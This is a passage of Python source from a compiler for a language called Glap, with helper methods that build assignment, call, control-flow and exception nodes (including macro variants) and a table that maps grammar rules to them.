cls.MACRO_VARIABLE):\n if inplaceop:\n if inmacro:\n a = MacroNode(GetLocal, MacroNodeAtom(lhs.node.value()))\n a.deferred.append(SetLocation(*make_location(\n context, lhs.node.position()\n )))\n ve = MacroNode(inplaceop, a, rhs.value_expr())\n ve.deferred.append(SetLocation(*make_location(\n context, loc\n )))\n o.node = MacroNode(\n SetLocal, MacroNodeAtom(lhs.node.value()), ve\n )\n else:\n a = GetLocal(lhs.node.value())\n a.set_location(*make_location(\n context, lhs.node.position()\n ))\n ve = inplaceop(a, rhs.value_expr())\n ve.set_location(*make_location(context, loc))\n o.node = SetLocal(lhs.node.value(), ve)\n else:\n if inmacro:\n o.node = MacroNode(\n SetLocal,\n MacroNodeAtom(lhs.node.value()),\n rhs.value_expr()\n )\n else:\n o.node = SetLocal(lhs.node.value(), rhs.value_expr())\n elif lhs.kind in (cls.INDEX_EXPR, cls.MACRO_NODE_INDEX):\n if inplaceop:\n if inmacro:\n ve = MacroNode(inplaceop, lhs.node, rhs.value_expr())\n ve.deferred.append(SetLocation(*make_location(\n context, loc\n )))\n o.node = MacroNode(\n SetItem, lhs.node.nodes[0], lhs.node.nodes[1], ve\n )\n else:\n ve = inplaceop(lhs.node, 
rhs.value_expr())\n ve.set_location(*make_location(context, loc))\n o.node = SetItem(\n lhs.node.operands[0], lhs.node.operands[1], ve\n )\n else:\n if inmacro:\n o.node = MacroNode(\n SetItem,\n lhs.node.nodes[0],\n lhs.node.nodes[1],\n rhs.value_expr()\n )\n else:\n o.node = SetItem(\n lhs.node.operands[0],\n lhs.node.operands[1],\n rhs.value_expr()\n )\n elif lhs.kind in (cls.ACCESS_EXPR, cls.MACRO_NODE_ACCESS):\n if inplaceop:\n if inmacro:\n ve = MacroNode(inplaceop, lhs.node, rhs.value_expr())\n ve.deferred.append(SetLocation(*make_location(\n context, loc\n )))\n o.node = MacroNode(\n SetMember, lhs.node.nodes[0], lhs.node.nodes[1], ve\n )\n else:\n ve = inplaceop(lhs.node, rhs.value_expr())\n ve.set_location(*make_location(context, loc))\n o.node = SetMember(lhs.node.module, lhs.node.member, ve)\n else:\n if inmacro:\n o.node = MacroNode(\n SetMember,\n lhs.node.nodes[0],\n lhs.node.nodes[1],\n rhs.value_expr()\n )\n else:\n o.node = SetMember(\n lhs.node.module, lhs.node.member, rhs.value_expr()\n )\n else:\n raise GlapSyntaxError(context,\n \"Left-hand side of assignment must be l-value\", loc\n )\n if inmacro:\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.node.set_location(*make_location(context, loc))\n o.code.extend(lhs.code)\n o.code.extend(rhs.code)\n o.code.append(o.node)\n o.vars.extend(rhs.vars)\n if lhs.kind in (cls.VARIABLE, cls.MACRO_VARIABLE):\n o.vars.insert(0, lhs.node.value())\n if inmacro:\n o.value_holder = MacroNode(\n GetLocal, MacroNodeAtom(lhs.node.value())\n )\n o.value_holder.deferred.append(SetLocation(*make_location(\n context, lhs.node.position()\n )))\n else:\n o.value_holder = GetLocal(lhs.node.value())\n o.value_holder.set_location(\n *make_location(context, lhs.node.position())\n )\n else:\n o.value_holder = lhs.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_call(cls, context, loc, f, fargs):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, f)\n for x in fargs:\n cls.checknode(context, loc, x)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_CALL\n o.node = MacroNode(\n Call, f.value_expr(), *[x.value_expr() for x in fargs]\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.CALL_EXPR\n o.node = Call(f.value_expr(), *[x.value_expr() for x in fargs])\n o.node.set_location(*make_location(context, loc))\n o.code.extend(f.code)\n o.vars.extend(f.vars)\n for x in fargs:\n o.code.extend(x.code)\n o.vars.extend(x.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_variable(cls, context, var):\n \"\"\"\n \"\"\"\n\n o = cls(context, var.position(), \"\")\n o.node = var\n if context.actions.inmacro:\n o.kind = cls.MACRO_VARIABLE\n o.value_holder = MacroNode(GetLocal, MacroNodeAtom(var.value()))\n o.value_holder.deferred.append(\n SetLocation(*make_location(context, var.position()))\n )\n else:\n o.kind = cls.VARIABLE\n o.value_holder = GetLocal(var.value())\n o.value_holder.set_location(\n *make_location(context, var.position())\n )\n return o\n #-def\n\n @classmethod\n def make_getvalue(cls, context, var):\n \"\"\"\n \"\"\"\n\n o = cls(context, var.position(), \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_NODE_NULLARY\n o.node = MacroNode(GetLocal, MacroNodeAtom(var.value()))\n o.node.deferred.append(SetLocation(*make_location(\n context, var.position()\n )))\n else:\n o.kind = cls.NULLARY_EXPR\n o.node = 
GetLocal(var.value())\n o.node.set_location(*make_location(context, var.position()))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_macroparam(cls, context, var):\n \"\"\"\n \"\"\"\n\n if not context.actions.inmacro:\n raise GlapSyntaxError(context,\n \"Macro parameter must be used only inside macro body\",\n var.position()\n )\n o = cls(context, var.position(), \"\")\n o.kind = cls.MACRO_PARAM\n o.node = MacroNodeParam(var.value())\n o.node.deferred.append(SetLocation(*make_location(\n context, var.position()\n )))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_expand(cls, context, loc, m, margs):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, m)\n for x in margs:\n cls.checknode(context, loc, x)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_EXPAND\n o.node = MacroNode(\n Expand, m.value_expr(), *[x.value_expr() for x in margs]\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.EXPAND\n o.node = Expand(m.value_expr(), *[x.value_expr() for x in margs])\n o.node.set_location(*make_location(context, loc))\n o.code.extend(m.code)\n o.vars.extend(m.vars)\n for x in margs:\n o.code.extend(x.code)\n o.vars.extend(x.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_literal(cls, context, t):\n \"\"\"\n \"\"\"\n\n o = cls(context, t.position(), \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_NODE_NULLARY\n o.node = MacroNode(Const, MacroNodeAtom(t.value(True)))\n o.node.deferred.append(SetLocation(*make_location(\n context, t.position()\n )))\n else:\n o.kind = cls.NULLARY_EXPR\n o.node = Const(t.value(True))\n o.node.set_location(*make_location(context, t.position()))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_pair(cls, context, loc, x, y):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, x)\n cls.checknode(context, loc, y)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_BINARY\n o.node = MacroNode(NewPair, x.value_expr(), y.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.BINARY_EXPR\n o.node = NewPair(x.value_expr(), y.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(x.code)\n o.code.extend(y.code)\n o.vars.extend(x.vars)\n o.vars.extend(y.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_list(cls, context, loc, items):\n \"\"\"\n \"\"\"\n\n for i in items:\n cls.checknode(context, loc, i)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_NARY\n o.node = MacroNode(NewList, *[i.value_expr() for i in items])\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.NARY_EXPR\n o.node = NewList(*[i.value_expr() for i in items])\n o.node.set_location(*make_location(context, loc))\n for i in items:\n o.code.extend(i.code)\n o.vars.extend(i.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_hash(cls, context, loc, items):\n \"\"\"\n \"\"\"\n\n for k, v in items:\n cls.checknode(context, loc, k)\n cls.checknode(context, loc, v)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_NARY\n items_ = []\n for k, v in items:\n p = MacroNode(NewPair, k.value_expr(), 
v.value_expr())\n p.deferred.append(k.value_expr().deferred[0])\n items_.append(p)\n o.node = MacroNode(NewHashMap, *items_)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.NARY_EXPR\n o.node = NewHashMap(*[\n (k.value_expr(), v.value_expr()) for k, v in items\n ])\n o.node.set_location(*make_location(context, loc))\n for k, v in items:\n o.code.extend(k.code)\n o.code.extend(v.code)\n o.vars.extend(k.vars)\n o.vars.extend(v.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_lambda(cls, context, loc, fargs, has_varargs, commands):\n \"\"\"\n \"\"\"\n\n if context.actions.procedure_nesting_level <= 0:\n raise GlapSyntaxError(context,\n ie_(\"Unballanced `define's\"), loc\n )\n for cmd in commands:\n cls.checknode(context, loc, cmd)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n body = []\n bvars = []\n for cmd in commands:\n body.extend(cmd.code)\n if cmd.kind not in (cls.ASSIGN_EXPR, cls.MACRO_NODE_ASSIGN):\n body.append(cmd.value_expr())\n bvars.extend(cmd.vars)\n fargs_ = [x.value() for x in fargs]\n bvars_ = [x for x in bvars if x not in fargs_]\n if inmacro:\n o.kind = cls.MACRO_NODE_LAMBDA\n o.node = MacroNode(\n Lambda,\n MacroNodeAtom(fargs_),\n MacroNodeAtom(has_varargs),\n MacroNodeSequence(*body),\n MacroNodeAtom(bvars_)\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.LAMBDA_EXPR\n o.node = Lambda(fargs_, has_varargs, body, bvars_)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n context.actions.procedure_nesting_level -= 1\n return o\n #-def\n\n @classmethod\n def make_block(cls, context, loc, commands, keep_varinfo = False):\n \"\"\"\n \"\"\"\n\n for cmd in commands:\n cls.checknode(context, loc, cmd)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n body = []\n for cmd in commands:\n body.extend(cmd.code)\n if keep_varinfo:\n o.vars.extend(cmd.vars)\n if cmd.kind not in (cls.ASSIGN_EXPR, cls.MACRO_NODE_ASSIGN):\n body.append(cmd.value_expr())\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Block, *body)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Block(*body)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_defmacro(cls, context, loc, name, params, body):\n \"\"\"\n \"\"\"\n\n if not context.actions.inmacro:\n raise GlapSyntaxError(context,\n ie_(\"Macro body is outside `defmacro'\"), loc\n )\n if context.actions.procedure_nesting_level != 0:\n raise GlapSyntaxError(context,\n ie_(\"Macro body is inside function\"), loc\n )\n for node in body:\n cls.checknode(context, loc, node)\n o = cls(context, loc, \"\")\n o.kind = cls.DEFMACRO_STATEMENT\n mbody = []\n for node in body:\n mbody.extend(node.code)\n if node.kind not in (cls.ASSIGN_EXPR, cls.MACRO_NODE_ASSIGN):\n mbody.append(node.value_expr())\n o.node = DefMacro(name.value(), [p.value() for p in params], mbody)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n context.actions.inmacro = False\n return o\n #-def\n\n @classmethod\n def make_define(cls, context, loc, name, params, has_varargs, body):\n \"\"\"\n \"\"\"\n\n if context.actions.inmacro:\n raise GlapSyntaxError(context,\n ie_(\"Function definition is inside macro\"), loc\n )\n if context.actions.procedure_nesting_level <= 0:\n raise 
GlapSyntaxError(context,\n ie_(\"Unballanced `define's\"), loc\n )\n cls.checknode(context, loc, body)\n params_ = [p.value() for p in params]\n bvars_ = [v for v in body.vars if v not in params_]\n body_ = body.value_expr().commands\n o = cls(context, loc, \"\")\n o.kind = cls.DEFINE_STATEMENT\n o.node = Define(name.value(), bvars_, params_, has_varargs, body_)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n context.actions.procedure_nesting_level -= 1\n return o\n #-def\n\n @classmethod\n def make_if(cls, context, loc, cond, then_part, elif_parts, else_part):\n \"\"\"\n \"\"\"\n\n inmacro = context.actions.inmacro\n if_then_parts = [(loc, cond, then_part)]\n if_then_parts.extend(elif_parts)\n node = None\n vars = []\n while if_then_parts:\n l, c, t = if_then_parts.pop()\n if node is None:\n node = []\n if else_part:\n ll, else_node = else_part[0]\n cls.checknode(context, ll, else_node)\n if inmacro:\n node.extend(else_node.value_expr().nodes)\n else:\n node.extend(else_node.value_expr().commands)\n vars.extend(else_node.vars)\n # `node' is either [] or [commands] or [macro nodes]\n cls.checknode(context, l, c)\n cls.checknode(context, l, t)\n if inmacro:\n node = c.code + [MacroNode(\n If,\n c.value_expr(),\n MacroNodeSequence(*t.value_expr().nodes),\n MacroNodeSequence(*node)\n )]\n node[-1].deferred.append(SetLocation(*make_location(\n context, l\n )))\n else:\n node = c.code + [If(\n c.value_expr(),\n t.value_expr().commands,\n node\n )]\n node[-1].set_location(*make_location(context, l))\n vars_ = []\n vars_.extend(c.vars)\n vars_.extend(t.vars)\n vars_.extend(vars)\n vars = vars_\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n else:\n o.kind = cls.STATEMENT\n o.node = node[-1]\n o.code = node[:-1]\n o.vars = vars\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_foreach(cls, context, loc, var, ie, body):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, ie)\n cls.checknode(context, loc, body)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(\n Foreach,\n MacroNodeAtom(var.value()),\n ie.value_expr(),\n MacroNodeSequence(*body.value_expr().nodes)\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Foreach(\n var.value(), ie.value_expr(), body.value_expr().commands\n )\n o.node.set_location(*make_location(context, loc))\n o.code.extend(ie.code)\n o.vars.append(var.value())\n o.vars.extend(ie.vars)\n o.vars.extend(body.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_while(cls, context, loc, cond, body):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, cond)\n if cond.code:\n raise GlapSyntaxError(\n context,\n ie_(\"More then one commands in while-condition expression\"),\n loc\n )\n cls.checknode(context, loc, body)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(\n While,\n cond.value_expr(),\n MacroNodeSequence(*body.value_expr().nodes)\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = While(\n cond.value_expr(), body.value_expr().commands\n )\n o.node.set_location(*make_location(context, loc))\n o.vars.extend(cond.vars)\n o.vars.extend(body.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n 
#-def\n\n @classmethod\n def make_dowhile(cls, context, loc, body, cond):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, body)\n cls.checknode(context, loc, cond)\n if cond.code:\n raise GlapSyntaxError(\n context,\n ie_(\"More then one commands in while-condition expression\"),\n loc\n )\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(\n DoWhile,\n MacroNodeSequence(*body.value_expr().nodes),\n cond.value_expr()\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = DoWhile(\n body.value_expr().commands, cond.value_expr()\n )\n o.node.set_location(*make_location(context, loc))\n o.vars.extend(body.vars)\n o.vars.extend(cond.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_break(cls, context, loc):\n \"\"\"\n \"\"\"\n\n o = cls(context, loc, \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Break)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Break()\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_continue(cls, context, loc):\n \"\"\"\n \"\"\"\n\n o = cls(context, loc, \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Continue)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Continue()\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_return(cls, context, loc):\n \"\"\"\n \"\"\"\n\n o = cls(context, loc, \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Return)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Return()\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_return_with_value(cls, context, loc, rv):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, rv)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Return, rv.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Return(rv.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(rv.code)\n o.vars.extend(rv.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_try(cls, context, loc, tryblock, catches, fnly):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, tryblock)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n b = tryblock.value_expr().nodes\n o.vars.extend(tryblock.vars)\n c = []\n for ll, ee, ev, hh in catches:\n cls.checknode(context, ll, hh)\n if ev:\n ev = ev.value()\n o.vars.append(ev)\n c.append(MacroNodeSequence(\n MacroNodeAtom(ee.value()),\n MacroNodeAtom(ev),\n MacroNodeSequence(*hh.value_expr().nodes)\n ))\n o.vars.extend(hh.vars)\n f = []\n if fnly:\n ll, ff = fnly[0]\n cls.checknode(context, ll, ff)\n f.extend(ff.value_expr().nodes)\n o.vars.extend(ff.vars)\n o.node = MacroNode(\n TryCatchFinally,\n MacroNodeSequence(*b),\n MacroNodeSequence(*c),\n MacroNodeSequence(*f)\n )\n 
o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n b = tryblock.value_expr().commands\n o.vars.extend(tryblock.vars)\n c = []\n for ll, ee, ev, hh in catches:\n cls.checknode(context, ll, hh)\n if ev:\n ev = ev.value()\n o.vars.append(ev)\n c.append((ee.value(), ev, hh.value_expr().commands))\n o.vars.extend(hh.vars)\n f = []\n if fnly:\n ll, ff = fnly[0]\n cls.checknode(context, ll, ff)\n f.extend(ff.value_expr().commands)\n o.vars.extend(ff.vars)\n o.node = TryCatchFinally(b, c, f)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_throw(cls, context, loc, ee, em):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, ee)\n if em:\n cls.checknode(context, loc, em)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n if em:\n o.node = MacroNode(Throw, ee.value_expr(), em.value_expr())\n else:\n o.node = MacroNode(Rethrow, ee.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n if em:\n o.node = Throw(ee.value_expr(), em.value_expr())\n else:\n o.node = Rethrow(ee.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(ee.code)\n o.vars.extend(ee.vars)\n if em:\n o.code.extend(em.code)\n o.vars.extend(em.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n#-class\n\nclass GlapParserActions(object):\n \"\"\"\n \"\"\"\n __slots__ = [ 'context', 'inmacro', 'procedure_nesting_level', 'actions' ]\n\n def __init__(self, context):\n \"\"\"\n \"\"\"\n\n context.actions = self\n self.context = context\n self.inmacro = False\n self.procedure_nesting_level = 0\n self.actions = {\n 'start': self.on_start,\n 'module': self.on_module,\n 'grammar': self.on_grammar,\n 'rule': self.on_rule,\n 'rule_rhs_expr(_|_)': self.on_rule_rhs_expr_alt,\n 'rule_rhs_expr(_-_)': self.on_rule_rhs_expr_sub,\n 'rule_rhs_expr(_ _)': self.on_rule_rhs_expr_cat,\n 'rule_rhs_expr(_*)': self.on_rule_rhs_expr_star,\n 'rule_rhs_expr(_+)': self.on_rule_rhs_expr_plus,\n 'rule_rhs_expr(_?)': self.on_rule_rhs_expr_opt,\n 'rule_rhs_expr(-_)': self.on_rule_rhs_expr_neg,\n 'rule_rhs_expr(~_)': self.on_rule_rhs_expr_inv,\n 'rule_rhs_expr(_\\'_)': self.on_rule_rhs_expr_label,\n 'rule_rhs_expr_atom(ID)': self.on_rule_rhs_expr_atom_var,\n 'rule_rhs_expr_atom(STR)': self.on_rule_rhs_expr_atom_str,\n 'rule_rhs_expr_atom(STR..STR)': self.on_rule_rhs_expr_atom_range,\n 'rule_rhs_expr_atom(eps)': self.on_rule_rhs_expr_atom_epsilon,\n 'rule_rhs_expr_atom(action)': self.on_rule_rhs_expr_atom_action,\n 'c_expr(_=_)': (lambda *args:\n GlapCompileCmdHelper.make_assign(*args)\n ),\n 'c_expr(_+=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Add)\n ),\n 'c_expr(_-=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Sub)\n ),\n 'c_expr(_*=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Mul)\n ),\n 'c_expr(_/=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Div)\n ),\n 'c_expr(_%=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Mod)\n ),\n 'c_expr(_&=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, BitAnd)\n ),\n 'c_expr(_|=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, BitOr)\n ),\n 'c_expr(_^=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, BitXor)\n 
),\n 'c_expr(_<<=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, ShiftL)\n ),\n 'c_expr(_>>=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, ShiftR)\n ),\n 'c_expr(_&&=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, And)\n ),\n 'c_expr(_||=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Or)\n ),\n 'c_expr(_.=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Concat)\n ),\n 'c_expr(_++=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Join)\n ),\n 'c_expr(_~~=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Merge)\n ),\n 'c_expr(_||_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Or)\n ),\n 'c_expr(_&&_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, And)\n ),\n 'c_expr(_<_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Lt)\n ),\n 'c_expr(_>_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Gt)\n ),\n 'c_expr(_<=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Le)\n ),\n 'c_expr(_>=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Ge)\n ),\n 'c_expr(_==_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Eq)\n ),\n 'c_expr(_!=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Ne)\n ),\n 'c_expr(_===_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Is)\n ),\n 'c_expr(_in_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Contains)\n ),\n 'c_expr(_|_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, BitOr)\n ),\n 'c_expr(_&_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, BitAnd)\n ),\n 'c_expr(_^_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, BitXor)\n ),\n 'c_expr(_<<_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, ShiftL)\n ),\n 'c_expr(_>>_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, ShiftR)\n ),\n 'c_expr(_+_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Add)\n ),\n 'c_expr(_-_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Sub)\n ),\n 'c_expr(_._)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Concat)\n ),\n 'c_expr(_++_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Join)\n ),\n 'c_expr(_~~_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Merge)\n ),\n 'c_expr(_*_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Mul)\n ),\n 'c_expr(_/_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Div)\n ),\n 'c_expr(_%_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Mod)\n ),\n 'c_expr(_ _)': (lambda *args:\n GlapCompileCmdHelper.make_call(*args)\n ),\n 'c_expr(-_)': (lambda c, l, e:\n GlapCompileCmdHelper.make_unary(c, l, e, Neg)\n ),\n 'c_expr(!_)': (lambda c, l, e:\n GlapCompileCmdHelper.make_unary(c, l, e, Not)\n ),\n 'c_expr(~_)': (lambda c, l, e:\n GlapCompileCmdHelper.make_unary(c, l, e, Inv)\n ),\n 'c_expr(_[_])': (lambda *args:\n GlapCompileCmdHelper.make_index(*args)\n ),\n 'c_expr(_:ID)': (lambda *args:\n GlapCompileCmdHelper.make_access(*args)\n ),\n 'c_expr_atom(ID)': (lambda *args:\n GlapCompileCmdHelper.make_variable(*args)\n ),\n 'c_expr_atom($ID)': (lambda *args:\n GlapCompileCmdHelper.make_getvalue(*args)\n ),\n 
'c_expr_atom(#ID)': (lambda *args:\n GlapCompileCmdHelper.make_macroparam(*args)\n ),\n 'c_expr_atom($(_ _))': (lambda *args:\n GlapCompileCmdHelper.make_expand(*args)\n ),\n 'c_expr_atom(INT)': (lambda *args:\n GlapCompileCmdHelper.make_literal(*args)\n ),\n 'c_expr_atom(FLOAT)': (lambda *args:\n GlapCompileCmdHelper.make_literal(*args)\n ),\n 'c_expr_atom(STR)': (lambda *args:\n GlapCompileCmdHelper.make_literal(*args)\n ),\n 'c_expr_atom(pair)': (lambda *args:\n GlapCompileCmdHelper.make_pair(*args)\n ),\n 'c_expr_atom(list)': (lambda *args:\n GlapCompileCmdHelper.make_list(*args)\n ),\n 'c_expr_atom(hash)': (lambda *args:\n GlapCompileCmdHelper.make_hash(*args)\n ),\n 'c_expr_atom(lambda)': (lambda *args:\n GlapCompileCmdHelper.make_lambda(*args)\n ),\n 'c_stmt(block)': (lambda *args:\n GlapCompileCmdHelper.make_block(*args)\n ),\n 'c_stmt(defmacro)': (lambda *args:\n GlapCompileCmdHelper.make_defmacro(*args)\n ),\n 'c_stmt(define)': (lambda *args:\n GlapCompileCmdHelper.make_define(*args)\n ),\n 'c_stmt(if)': (lambda *args:\n GlapCompileCmdHelper.make_if(*args)\n ),\n 'c_stmt(foreach)': (lambda *args:\n GlapCompileCmdHelper.make_foreach(*args)\n ),\n 'c_stmt(while)': (lambda *args:\n GlapCompileCmdHelper.make_while(*args)\n ),\n 'c_stmt(do-while)': (lambda *args:\n GlapCompileCmdHelper.make_dowhile(*args)\n ),\n 'c_stmt(break)': (lambda *args:\n GlapCompileCmdHelper.make_break(*args)\n ),\n 'c_stmt(continue)': (lambda *args:\n GlapCompileCmdHelper.make_continue(*args)\n ),\n 'c_stmt(return)': (lambda *args:\n GlapCompileCmdHelper.make_return(*args)\n ),\n 'c_stmt(return(expr))': (lambda *args:\n 